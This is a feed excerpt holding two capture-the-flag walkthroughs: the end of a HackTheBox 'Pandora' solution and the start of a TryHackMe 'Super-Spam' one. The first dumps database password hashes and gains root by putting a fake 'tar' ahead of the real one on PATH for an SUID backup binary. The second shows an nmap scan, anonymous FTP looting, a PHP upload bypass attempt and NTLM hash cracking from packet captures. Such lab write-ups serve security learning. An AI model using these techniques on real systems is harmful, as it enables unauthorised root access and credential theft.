matt@pandora:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can stop the chisel instances now :)&lt;/p&gt;

&lt;p&gt;We can finally get the contents of &lt;code&gt;/var/www/pandora/pandora_console/include/config.php&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="c1"&gt;// File generated by centos kickstart&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"dbtype"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"mysql"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"dbname"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"pandora"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"dbuser"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"pandora"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"dbpass"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"CENSORED"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"dbhost"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"localhost"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"homedir"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"/var/www/pandora/pandora_console"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nv"&gt;$config&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"homeurl"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"/pandora_console"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nb"&gt;error_reporting&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; 
&lt;span class="nv"&gt;$ownDir&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;dirname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;__FILE__&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="mf"&gt;.&lt;/span&gt; &lt;span class="s1"&gt;'/'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$ownDir&lt;/span&gt; &lt;span class="mf"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;"config_process.php"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;matt@pandora:~$ mysql -u pandora -p pandora
Enter password:

MariaDB [pandora]&amp;gt; show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| pandora            |
+--------------------+
MariaDB [pandora]&amp;gt; show tables;
| tpassword_history                  | # Only Interesting table I found

MariaDB [pandora]&amp;gt; select * from tpassword_history;
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password                         | date_begin          | date_end            |
+---------+---------+----------------------------------+---------------------+---------------------+
|       1 | matt    | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
|       2 | daniel  | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+
2 rows in set (0.001 sec)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Ran it through crackstation. Nothing useful.&lt;/p&gt;

&lt;p&gt;Now, let's try to try to do something with that SUID binary &lt;code&gt;/usr/bin/pandora_backup&lt;/code&gt;. Downloading to local system and decompiling with Ghidra gives us the following&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="n"&gt;__uid_t&lt;/span&gt; &lt;span class="n"&gt;__euid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="n"&gt;__uid_t&lt;/span&gt; &lt;span class="n"&gt;__ruid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;iVar1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

  &lt;span class="n"&gt;__euid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;getuid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="n"&gt;__ruid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;geteuid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="n"&gt;setreuid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__ruid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;__euid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"PandoraFMS Backup Utility"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Now attempting to backup PandoraFMS client"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="n"&gt;iVar1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iVar1&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Backup successful!"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Terminating program!"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;puts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Backup failed!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Check your permissions!"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;iVar1&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If we could write something in PATH, we can execute a fake &lt;code&gt;tar&lt;/code&gt; to get us a root shell.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;matt@pandora:~/bin&lt;span class="nv"&gt;$ &lt;/span&gt;which bash
/usr/bin/bash
matt@pandora:~/bin&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"/usr/bin/bash -p"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;tar
&lt;/span&gt;matt@pandora:~/bin&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;777 &lt;span class="nb"&gt;tar
&lt;/span&gt;matt@pandora:~/bin&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;PATH&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$PWD&lt;/span&gt;:&lt;span class="nv"&gt;$PATH&lt;/span&gt;
matt@pandora:~/bin&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$PATH&lt;/span&gt;
/home/matt/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~/bin&lt;span class="nv"&gt;$ &lt;/span&gt;/usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~/bin# &lt;span class="nb"&gt;id
&lt;/span&gt;&lt;span class="nv"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;(&lt;/span&gt;root&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;gid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;groups&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000&lt;span class="o"&gt;(&lt;/span&gt;matt&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Go get that root flag!&lt;/p&gt;

</description>
      <category>hackthebox</category>
      <category>infosec</category>
      <category>ctf</category>
      <category>security</category>
    </item>
    <item>
      <title>TryHackMe Super-Spam Walkthrough</title>
      <dc:creator>Krishna</dc:creator>
      <pubDate>Tue, 10 Aug 2021 13:32:18 +0000</pubDate>
      <link>https://dev.to/wandering-geek/tryhackme-super-spam-walkthrough-42ed</link>
      <guid>https://dev.to/wandering-geek/tryhackme-super-spam-walkthrough-42ed</guid>
      <description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/superspamr" rel="noopener noreferrer"&gt;https://tryhackme.com/room/superspamr&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Defeat the evil Super-Spam, and save the day!!&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  1)  Enumeration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Nmap 7.91 scan initiated Sat Aug  7 19:25:30 2021 as: nmap -p- -A -Pn -oN resultsNmap -vv 10.10.110.84                                                                   &lt;/span&gt;
Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;10.10.110.84                                                                                                                                          
Host is up, received user-set &lt;span class="o"&gt;(&lt;/span&gt;0.17s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;                                                                                                                             
Scanned at 2021-08-07 19:25:31 IST &lt;span class="k"&gt;for &lt;/span&gt;360s                                                                                                                                
Not shown: 65530 closed ports                                                                                                                                              
Reason: 65530 resets                                                                                                                                                       
PORT     STATE SERVICE REASON         VERSION                                                                                                                              
80/tcp   open  http    syn-ack ttl 60 Apache httpd 2.4.29 &lt;span class="o"&gt;((&lt;/span&gt;Ubuntu&lt;span class="o"&gt;))&lt;/span&gt;                                                                                                       
|_http-generator: concrete5 - 8.5.2                                                                                                                                        
| http-methods:                                                                                                                                                            
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                               
|_http-server-header: Apache/2.4.29 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu&lt;span class="o"&gt;)&lt;/span&gt;                                                                                                                               
|_http-title: &lt;span class="s2"&gt;"Home :: Super-Spam                                                                                                                                           "&lt;/span&gt;
4012/tcp open  ssh     syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 &lt;span class="o"&gt;(&lt;/span&gt;Ubuntu Linux&lt;span class="p"&gt;;&lt;/span&gt; protocol 2.0&lt;span class="o"&gt;)&lt;/span&gt;                                                                         
| ssh-hostkey:                                                                                                                                                             
|   2048 86:60:04:c0:a5:36:46:67:f5:c7:24:0f:df:d0:03:14 &lt;span class="o"&gt;(&lt;/span&gt;RSA&lt;span class="o"&gt;)&lt;/span&gt;                                                                                                             
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjPfdefRhbpiW/oi5uUVtVRW/pYZcnADODOU4e80iSnuqWfRB5DAXTpzKZNw5JBQGy+4Amwz0DyX/TlYBgXRxPXwFimpBXnc02jpMknSaDzdRnInU8wFcsBQc+GraYz1mMH
vRcco2FfIrKurDbyEsBCzwJuk/RKdSq2rcFLhq8QAPoxc9FQcNeUIZrBt53/7+fD7B7NvjjU22+hXZhjt6PLC3LDWcaMvpYCxMYGwKoC9xTs+FtzEFrt6yWzKrXV1iNuKdNyt8vu22bcPl2GrQ9ai9I89DEY4wB3dADP6AfNikb
i0QWjdNbW2fhblG9PvKRu9s3IbpVueX2qBfInuAF                                                                                                                                   
|   256 ce:d2:f6:ab:69:7f:aa:31:f5:49:70:e5:8f:62:b0:b7 &lt;span class="o"&gt;(&lt;/span&gt;ECDSA&lt;span class="o"&gt;)&lt;/span&gt;                                                                                                            
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIs/ZpOvCaKtCEwW4YraPciYLZnrRXDR6voHu0PipWaQpcdnsc8Vg1WMpkX0xgjXc9eD3NuZmBtTcIDTJXi7v4U&lt;span class="o"&gt;=&lt;/span&gt;         
|   256 73:a0:a1:97:c4:33:fb:f4:4a:5c:77:f6:ac:95:76:ac &lt;span class="o"&gt;(&lt;/span&gt;ED25519&lt;span class="o"&gt;)&lt;/span&gt;                                                                                                          
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHHX1bbkvh6bRHE0hWipYWoYyh+Q+uy3E0yCBOoyY888                                                                                         
4019/tcp open  ftp     syn-ack ttl 60 vsftpd 3.0.3                                                                                                                         
| ftp-anon: Anonymous FTP login allowed &lt;span class="o"&gt;(&lt;/span&gt;FTP code 230&lt;span class="o"&gt;)&lt;/span&gt;
| drwxr-xr-x    2 ftp      ftp          4096 Feb 20 14:42 IDS_logs
|_-rw-r--r--    1 ftp      ftp           526 Feb 20 13:53 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.17.9.26
|      Logged &lt;span class="k"&gt;in &lt;/span&gt;as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session &lt;span class="nb"&gt;timeout &lt;/span&gt;&lt;span class="k"&gt;in &lt;/span&gt;seconds is 300
|      Control connection is plain text
|      Data connections will be plain text 
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable 
|_End of status
5901/tcp open  vnc     syn-ack ttl 60 VNC &lt;span class="o"&gt;(&lt;/span&gt;protocol 3.8&lt;span class="o"&gt;)&lt;/span&gt;
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     VNC Authentication &lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;
|     Tight &lt;span class="o"&gt;(&lt;/span&gt;16&lt;span class="o"&gt;)&lt;/span&gt;
|   Tight auth subtypes: 
|_    STDV VNCAUTH_ &lt;span class="o"&gt;(&lt;/span&gt;2&lt;span class="o"&gt;)&lt;/span&gt;
6001/tcp open  X11     syn-ack ttl 60 &lt;span class="o"&gt;(&lt;/span&gt;access denied&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h5&gt;
  
  
  Observations from nmap scan.
&lt;/h5&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Port 80 - Apache 2.4.29 - Webserver&lt;br&gt;&lt;br&gt;
Running a website that makes use of Concrete5 CMS 8.5.2 ( looking at page source, and also using Wappalyzer )&lt;br&gt;&lt;br&gt;
Possible XSS Exploit - &lt;a href="https://www.exploit-db.com/exploits/49721" rel="noopener noreferrer"&gt;Concrete5 8.5.4 - 'name' Stored XSS&lt;/a&gt;, &lt;a href="https://raw.githubusercontent.com/Quadron-Research-Lab/CVE/main/CVE-2021-3111.pdf" rel="noopener noreferrer"&gt;https://raw.githubusercontent.com/Quadron-Research-Lab/CVE/main/CVE-2021-3111.pdf&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Another possible RCE Exploit -&amp;gt; &lt;a href="https://hackerone.com/reports/768322" rel="noopener noreferrer"&gt;https://hackerone.com/reports/768322&lt;/a&gt;, &lt;a href="https://github.com/concrete5/concrete5/issues/8319" rel="noopener noreferrer"&gt;https://github.com/concrete5/concrete5/issues/8319&lt;/a&gt;  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Port 4012 - SSH - OpenSSH 7.6p1  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Port 4019 - FTP - vsftpd 3.0.3&lt;br&gt;&lt;br&gt;
Anonymous login allowed. Let's take a look inside.&lt;br&gt;
&lt;/p&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ftp&amp;gt; &lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;
227 Entering Passive Mode &lt;span class="o"&gt;(&lt;/span&gt;10,10,140,162,190,141&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
150 Here comes the directory listing.
drwxr-xr-x    4 ftp      ftp          4096 May 30 19:26 &lt;span class="nb"&gt;.&lt;/span&gt;
drwxr-xr-x    4 ftp      ftp          4096 May 30 19:26 ..
drwxr-xr-x    2 ftp      ftp          4096 May 30 19:26 .cap
drwxr-xr-x    2 ftp      ftp          4096 Feb 20 14:42 IDS_logs
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt;    1 ftp      ftp           526 Feb 20 13:53 note.txt

ftp&amp;gt; &lt;span class="nb"&gt;ls                                                                                           &lt;/span&gt;227 Entering Passive Mode &lt;span class="o"&gt;(&lt;/span&gt;10,10,140,162,182,217&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;                                               150 Here comes the directory listing.                                                             &lt;span class="nt"&gt;-rwxr--r--&lt;/span&gt;    1 ftp      ftp        370488 Feb 20 14:46 SamsNetwork.cap                           226 Directory send OK.                                                                           ftp&amp;gt; &lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-la&lt;/span&gt;                                                                                       227 Entering Passive Mode &lt;span class="o"&gt;(&lt;/span&gt;10,10,140,162,193,19&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;                                                 150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 May 30 19:26 &lt;span class="nb"&gt;.&lt;/span&gt;                            
drwxr-xr-x    4 ftp      ftp          4096 May 30 19:26 ..                           
&lt;span class="nt"&gt;-rw-r--r--&lt;/span&gt;    1 ftp      ftp           249 Feb 20 13:36 .quicknote.txt               
&lt;span class="nt"&gt;-rwxr--r--&lt;/span&gt;    1 ftp      ftp        370488 Feb 20 14:46 SamsNetwork.cap
&lt;/code&gt;&lt;/pre&gt;


&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;VERY IMPORTANT&lt;/strong&gt; - Usually we don't look for hidden files in FTP servers, which in this case would have caused me to miss the &lt;code&gt;.cap&lt;/code&gt; directory. I'll admit I did not see them in my first attempt at the machine. Came back to the machine, and execute &lt;code&gt;ls -a&lt;/code&gt; in an act of desperation, which thankfuly turned out to be true.  &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Contents of &lt;code&gt;note.txt&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──(kali㉿kali)-[~/Documents/thm_superspam]
└─$ cat note.txt        
12th January: Note to self. Our IDS seems to be experiencing high volumes of unusual activity.
We need to contact our security consultants as soon as possible. I fear something bad is going
to happen. -adam

13th January: We've included the wireshark files to log all of the unusual activity. It keeps
occuring during midnight. I am not sure why.. This is very odd... -adam

15th January: I could swear I created a new blog just yesterday. For some reason it is gone... -adam

24th January: Of course it is... - super-spam :)

&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;It seems we have to look into the &lt;code&gt;.pcap&lt;/code&gt; files aka network capture files to get more info. Apparently whatever unusual stuff happened, it happened around midnight.  &lt;/p&gt;

&lt;p&gt;The hacker probably compromised the CMS and deleted the blog post left by this &lt;code&gt;adam&lt;/code&gt; (possible username to keep in mind). And looks like the hacker is such a show-off that they left a message in &lt;code&gt;note.txt&lt;/code&gt;.    &lt;/p&gt;

&lt;p&gt;After going into the &lt;code&gt;IDS_logs&lt;/code&gt; folder, we see so many files. Most of the files in this dir are zero-byte files. But there were four .pcap files that I downloaded, which were the only ones that had any bytes in them.  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F83si7olkm7p7e8a5y144.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F83si7olkm7p7e8a5y144.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;Now, to the contents of the &lt;code&gt;.cap&lt;/code&gt; directory.&lt;br&gt;
Contents of &lt;code&gt;.quicknote.txt&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;└─$ cat .quicknote.txt                           
 It worked... My evil plan is going smoothly.
 I will place this .cap file here as a souvenir to remind me of how I got in...
 Soon! Very soon!
 My Evil plan of a linux-free galaxy will be complete.
 Long live Windows, the superior operating system!
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;The other file in this directory is &lt;code&gt;SamsNetwork.cap&lt;/code&gt;. So according to &lt;code&gt;super-spam&lt;/code&gt;, this capture file contains the means for us to "get in", whatever that means.  &lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  2) Foothold
&lt;/h3&gt;

&lt;h4&gt;
  
  
  PHP File Upload Attempt
&lt;/h4&gt;

&lt;p&gt;For this, my first attempt was to get a reverse shell using a PHP file upload.  &lt;/p&gt;

&lt;p&gt;While going through the blog, I noticed that the blog posts allowed comments to be made, along with attachments. &lt;/p&gt;

&lt;p&gt;Although image attachments were allowed in the comments, PHP attachments were not. This was due to a client-side filter(jQuery file upload handling code). &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fir9r8p7ohnl4px95vypk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fir9r8p7ohnl4px95vypk.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;

&lt;p&gt;This filter can easily be avoided by modifying the page response using a proxy(Burp Intercept/ZAP Breakpoint).   &lt;/p&gt;

&lt;p&gt;But even after this, there seemed to be server-side filters preventing a file upload.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpi2t3stxjgod7t3zx13h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpi2t3stxjgod7t3zx13h.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcztdla8vghoqbhqirl9p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcztdla8vghoqbhqirl9p.png" alt="Alt Text"&gt;&lt;/a&gt;  &lt;/p&gt;


&lt;h4&gt;
  
  
  Cracking NTLM hashes found in "IDS_logs" packet captures
&lt;/h4&gt;

&lt;p&gt;Now, let's take a step back and take a look at the packet captures. From &lt;code&gt;note.txt&lt;/code&gt; earlier, the "unusual" activity was close to midnight.  &lt;/p&gt;

&lt;p&gt;The 12th April 2021 pcap involves activity that occurs around 1 AM. Its mostly the SAMR protocol(&lt;a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380" rel="noopener noreferrer"&gt;https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/4df07fab-1bbc-452f-8e92-7853a3c7e380&lt;/a&gt;).   &lt;/p&gt;

&lt;p&gt;The pcap files for 13th and 16th are regarding HTTP requests to a Chinese domain, which we will ignore for now.  &lt;/p&gt;

&lt;p&gt;The pcap file for the 14th April 2021 is interesting, since it contains SMBv2 protocol captures that include NTLM authentication attempts. Let's see if we can get some useful data from this.  &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: Ultimately these credentials turned out to be useless, but it was a nice rabbit hole to follow :D  You can skip the NTLM hash cracking section and scroll down to the next one&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Took the help of this article to crack the NTLM hash, because I'm a noob at this =&amp;gt; &lt;a href="https://research.801labs.org/cracking-an-ntlmv2-hash/" rel="noopener noreferrer"&gt;https://research.801labs.org/cracking-an-ntlmv2-hash/&lt;/a&gt;  &lt;/p&gt;

